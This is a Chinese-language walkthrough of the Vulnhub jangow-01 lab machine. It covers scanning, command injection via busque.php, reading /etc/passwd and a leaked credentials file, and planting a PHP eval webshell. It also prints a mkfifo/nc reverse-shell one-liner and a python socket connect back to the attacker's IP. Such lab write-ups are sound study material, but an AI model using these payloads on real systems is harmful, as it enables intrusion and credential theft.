Vulnhub之jangow-01-1靶机解题过程(shell有问题)
jangow-01-1.0.1
识别目标主机IP地址
┌──(kali㉿kali)-[~/Vulnhub/jangow]
└─$ sudo netdiscover -i eth1Currently scanning: 192.168.155.0/16 | Screen View: Unique Hosts
3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.56.1 0a:00:27:00:00:0a 1 60 Unknown vendor
192.168.56.100 08:00:27:48:42:92 1 60 PCS Systemtechnik GmbH
192.168.56.118 08:00:27:14:f2:28 1 60 PCS Systemtechnik GmbH
利用Kali Linux自带的netdiscover工具识别目标主机的IP地址为192.18.56.118
NMAP扫描
┌──(kali㉿kali)-[~/Vulnhub/jangow]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.118 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2022-11-25 09:42 EST
Nmap scan report for bogon (192.168.56.118)
Host is up (0.00036s latency).
Not shown: 65533 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
80/tcp open http Apache httpd 2.4.18
| http-ls: Volume /
| SIZE TIME FILENAME
| - 2021-06-10 18:05 site/
|_
|_http-title: Index of /
|_http-server-header: Apache/2.4.18 (Ubuntu)
MAC Address: 08:00:27:14:F2:28 (Oracle VirtualBox virtual NIC)
Service Info: Host: 127.0.0.1; OS: Unix
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 114.29 seconds
NMAP扫描结果表明目标主机有2个开放端口:21(FTP)、80(HTTP)
Get Access
┌──(kali㉿kali)-[~/Vulnhub/jangow]
└─$ ftp 192.168.56.118
Connected to 192.168.56.118.
220 (vsFTPd 3.0.3)
Name (192.168.56.118:kali): anonymous
331 Please specify the password.
Password:
530 Login incorrect.
ftp: Login failed
ftp> quit
221 Goodbye.
目标主机不允许匿名访问。转向80端口的http服务:
利用浏览器访问80端口,被自动重定向到/site目录,页面点击几个链接:About, Projects,busque,最后一个链接被连接到:
http://192.168.56.118/site/busque.php?buscar=
似乎有本地文件包含漏洞,在尝试该漏洞之前,先扫描一下有无其他目录和文件:
┌──(kali㉿kali)-[~/Vulnhub/jangow]
└─$ gobuster dir -u http://192.168.56.118 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.118
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.3
[+] Timeout: 10s
===============================================================
2022/11/25 09:52:42 Starting gobuster in directory enumeration mode
===============================================================
/site (Status: 301) [Size: 315] [--> http://192.168.56.118/site/]
/server-status (Status: 403) [Size: 279]
Progress: 217379 / 220561 (98.56%)===============================================================
2022/11/25 09:53:06 Finished
===============================================================
┌──(kali㉿kali)-[~/Vulnhub/jangow]
└─$ gobuster dir -u http://192.168.56.118/site -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.118/site
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.3
[+] Timeout: 10s
===============================================================
2022/11/25 09:53:16 Starting gobuster in directory enumeration mode
===============================================================
/assets (Status: 301) [Size: 322] [--> http://192.168.56.118/site/assets/]
/css (Status: 301) [Size: 319] [--> http://192.168.56.118/site/css/]
/wordpress (Status: 301) [Size: 325] [--> http://192.168.56.118/site/wordpress/]
/js (Status: 301) [Size: 318] [--> http://192.168.56.118/site/js/]
Progress: 219874 / 220561 (99.69%)===============================================================
2022/11/25 09:53:41 Finished
===============================================================
发现/site目录下游wordpress,在利用wpscan工具扫描之前先回过头看下/busque链接,看是否存在本地文件包含或者命令执行漏洞:
┌──(kali㉿kali)-[~/Vulnhub/jangow]
└─$ curl http://192.168.56.118/site/busque.php?buscar=../../../../../../etc/passwd
结果表明目标不存在 文件包含漏洞,不过却能执行命令,如下所示:
┌──(kali㉿kali)-[~/Vulnhub/jangow]
└─$ curl http://192.168.56.118/site/busque.php?buscar=whoami
www-data──(kali㉿kali)-[~/Vulnhub/jangow]
└─$ curl http://192.168.56.118/site/busque.php?buscar=cat%20%20/home/jangow01/user.txt
d41d8cd98f00b204e9800998ecf8427e
得到user flag.
┌──(kali㉿kali)-[~/Vulnhub/jangow]
└─$ curl http://192.168.56.118/site/busque.php?buscar=cat%20%20/etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
syslog:x:104:108::/home/syslog:/bin/false
_apt:x:105:65534::/nonexistent:/bin/false
lxd:x:106:65534::/var/lib/lxd/:/bin/false
messagebus:x:107:111::/var/run/dbus:/bin/false
uuidd:x:108:112::/run/uuidd:/bin/false
dnsmasq:x:109:65534:dnsmasq,,,:/var/lib/misc:/bin/false
jangow01:x:1000:1000:desafio02,,,:/home/jangow01:/bin/bash
sshd:x:110:65534::/var/run/sshd:/usr/sbin/nologin
ftp:x:111:118:ftp daemon,,,:/srv/ftp:/bin/false
mysql:x:112:119:MySQL Server,,,:/nonexistent:/bin/false
看一下jangow01有没有私钥:
┌──(kali㉿kali)-[~/Vulnhub/jangow]
└─$ curl http://192.168.56.118/site/busque.php?buscar=ls%20-alh%20/home/jangow01
total 36K
drwxr-xr-x 4 jangow01 desafio02 4.0K Jun 10 2021 .
drwxr-xr-x 3 root root 4.0K Oct 31 2021 ..
-rw------- 1 jangow01 desafio02 200 Oct 31 2021 .bash_history
-rw-r--r-- 1 jangow01 desafio02 220 Jun 10 2021 .bash_logout
-rw-r--r-- 1 jangow01 desafio02 3.7K Jun 10 2021 .bashrc
drwx------ 2 jangow01 desafio02 4.0K Jun 10 2021 .cache
drwxrwxr-x 2 jangow01 desafio02 4.0K Jun 10 2021 .nano
-rw-r--r-- 1 jangow01 desafio02 655 Jun 10 2021 .profile
-rw-r--r-- 1 jangow01 desafio02 0 Jun 10 2021 .sudo_as_admin_successful
-rw-rw-r-- 1 jangow01 desafio02 33 Jun 10 2021 user.txt
看能不能通过入口获得shell
目标主机对命令有过滤机制。
┌──(kali㉿kali)-[~/Vulnhub/jangow]
└─$ curl http://192.168.56.118/site/busque.php?buscar=cat%20/var/www/html/.backup
$servername = "localhost";
$database = "jangow01";
$username = "jangow01";
$password = "abygurl69";
// Create connection
$conn = mysqli_connect($servername, $username, $password, $database);
// Check connection
if (!$conn) {
die("Connection failed: " . mysqli_connect_error());
}
echo "Connected successfully";
mysqli_close($conn);
得到数据库的用户名和密码,尝试是不是也是FTP用户名和密码,结果成功了
──(kali㉿kali)-[~/Vulnhub/jangow]
└─$ ftp 192.168.56.118
Connected to 192.168.56.118.
220 (vsFTPd 3.0.3)
Name (192.168.56.118:kali): jangow01
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
229 Entering Extended Passive Mode (|||8205|)
150 Here comes the directory listing.
drwxr-xr-x 3 0 0 4096 Oct 31 2021 html
226 Directory send OK.
ftp>
现在关键是要得到shell,看来通过执行nc, Python等命令无法实现该目的,可以用echo方法生成shell.php,然后访问该shell.php
192.168.56.118/site/busque.php?buscar=echo '' > jason.php
验证是否上传成功?
┌──(kali㉿kali)-[~/Vulnhub/jangow]
└─$ curl http://192.168.56.118/site/busque.php?buscar=ls
assets
busque.php
css
index.html
jason.php
js
shell.php
wordpress
192.168.56.118/site/busque.php?buscar=echo '<?php eval($_POST["cmd"]); ?>' > shell.php
http://192.168.56.118/site/busque.php?buscar=echo '<?php eval($_POST["cmd"]); ?>' > shell.php
http://192.168.56.118/site/busque.php?buscar=echo%20%27%3C?php%20eval($_POST[%22cmd%22]);%20?%3E%27%20%3E%20shell.php
调试了很久,还是用Linux版本的蚁剑连接到这个shell.php
但是这是webshell, 想反弹会一个shell,报错靶机的nc不支持-e选项
www-data:/var/www/html/site) $ echo '<?php system("mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.56.206 443 >/tmp/f");?>' > rev.php
(www-data:/var/www/html/site) $ ls
assets
busque.php
css
index.html
js
shell.php
wordpress
(www-data:/var/www/html/site) $ ls -alh
total 44K
drwxr-xr-x 6 www-data www-data 4.0K Nov 26 08:05 .
drwxr-xr-x 3 root root 4.0K Oct 31 2021 ..
drwxr-xr-x 3 www-data www-data 4.0K Jun 3 2021 assets
-rw-r--r-- 1 www-data www-data 35 Jun 10 2021 busque.php
drwxr-xr-x 2 www-data www-data 4.0K Jun 3 2021 css
-rw-r--r-- 1 www-data www-data 10K Jun 10 2021 index.html
drwxr-xr-x 2 www-data www-data 4.0K Jun 3 2021 js
-rw-r--r-- 1 www-data www-data 30 Nov 26 08:15 shell.php
drwxr-xr-x 2 www-data www-data 4.0K Jun 10 2021 wordpress
(www-data:/var/www/html/site) $ pwd
/var/www/html/site
(www-data:/var/www/html/site) $ python3 -c "import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('192.168.56.206',443));"
ret=2
(www-data:ret=2) $ touch 111.php
/bin/sh: 1: cd: can't cd to ret=2
不能像普通场景,用echo方式创建文件,而是用蚁剑本身的文件管理器创建文件,并编辑文件内容
www-data:/var/www/html/site) $ ls
111.php
assets
busque.php
css
index.html
js
reverse.php
shell.php
wordpress
现在用浏览器访问reverse.php,注意反弹回的端口只能是443,因为靶机有防火墙
┌──(kali㉿kali)-[~/Vulnhub/jangow]
└─$ sudo nc -nlvp 443
listening on [any] 443 ...
connect to [192.168.56.206] from (UNKNOWN) [192.168.56.118] 58412
/bin/sh: 0: can't access tty; job control turned off
$ id
whoami
which python
$ which python3
python3 -c 'import pty;pty.spawn("/bin/bash")'
www-data@jangow01:/var/www/html/site$
终于得到了正常的shell,此时再切换到jangow01用户,但是发现无法切换用户,这个shell还是有问题。
STRIVE FOR PROGRESS,NOT FOR PERFECTION
